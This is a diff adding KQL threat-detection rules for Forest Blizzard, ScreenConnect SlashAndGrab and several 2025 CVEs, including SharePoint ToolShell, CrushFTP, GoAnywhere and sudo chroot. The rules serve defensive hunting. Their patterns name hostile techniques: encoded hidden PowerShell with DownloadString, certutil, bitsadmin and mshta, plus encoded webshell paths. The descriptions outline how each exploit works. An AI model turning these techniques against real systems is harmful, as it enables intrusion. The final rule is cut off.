new file mode 100644
index 00000000..bc45385d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - JavaScript Constrained File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: medium
+// Description: Detects the creation of JavaScript files inside of the DriverStore directory.
+// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql
new file mode 100644
index 00000000..3daa2658
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql
@@ -0,0 +1,11 @@
+// Title: Forest Blizzard APT - Process Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the execution of specific processes and command line combination.
+// These were seen being created by Forest Blizzard as described by MSFT.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql
new file mode 100644
index 00000000..5175147d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql
@@ -0,0 +1,10 @@
+// Title: ScreenConnect - SlashAndGrab Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql
new file mode 100644
index 00000000..d330dbb9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql
@@ -0,0 +1,13 @@
+// Title: Potential Exploitation of GoAnywhere MFT Vulnerability
+// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-07
+// Level: high
+// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
+// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035
+// False Positives:
+//   - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
new file mode 100644
index 00000000..1e7d290c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit
+// Author: Gene Kazimiarovich
+// Date: 2025-04-20
+// Level: medium
+// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
+// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
+// MITRE Tactic: Credential Access
+// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054
+// False Positives:
+//   - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users)
+//   - Custom corporate scripts that programmatically generate .library-ms Files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql
new file mode 100644
index 00000000..0f4c8646
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process Spawned by CentreStack Portal AppPool
+// Author: Jason Rathbun (Blackpoint Cyber)
+// Date: 2025-04-17
+// Level: high
+// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats
+// False Positives:
+//   - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql
new file mode 100644
index 00000000..803f6d95
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious CrushFTP Child Process
+// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-10
+// Level: medium
+// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as
+// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.
+// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats
+// False Positives:
+//   - Legitimate CrushFTP administrative actions
+//   - Software updates
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql
new file mode 100644
index 00000000..c1b9e1cc
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql
@@ -0,0 +1,13 @@
+// Title: Potential SAP NetWeaver Webshell Creation
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+//   - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
+| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql
new file mode 100644
index 00000000..743b351e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql
@@ -0,0 +1,13 @@
+// Title: Potential SAP NetWeaver Webshell Creation - Linux
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+//   - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
+| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
new file mode 100644
index 00000000..88d627da
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
@@ -0,0 +1,15 @@
+// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: high
+// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
+// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
+// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
+// potentially leading to arbitrary code execution and privilege escalation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats
+// False Positives:
+//   - Backup locations
+
+DeviceFileEvents
+| where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
new file mode 100644
index 00000000..da63671e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: high
+// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053
+// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
+// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql
new file mode 100644
index 00000000..49dd5d56
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: Potential Notepad++ CVE-2025-49144 Exploitation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-26
+// Level: high
+// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.
+// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
+// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
new file mode 100644
index 00000000..efdc47dd
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
@@ -0,0 +1,11 @@
+// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-21
+// Level: critical
+// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
+// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
new file mode 100644
index 00000000..138d6269
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
@@ -0,0 +1,11 @@
+// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-21
+// Level: high
+// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities.
+// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
new file mode 100644
index 00000000..b2da971c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
+// Author: Nisarg Suthar
+// Date: 2025-08-01
+// Level: high
+// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats
+// False Positives:
+//   - Legitimate administrative command execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql
new file mode 100644
index 00000000..2dfa149d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql
@@ -0,0 +1,13 @@
+// Title: Linux Suspicious Child Process from Node.js - React2Shell
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
+// Date: 2025-12-05
+// Level: high
+// Description: Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).
+// This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands.
+// When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).
+// For other methods, the Image field will show the spawned process directly.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182
+
+DeviceProcessEvents
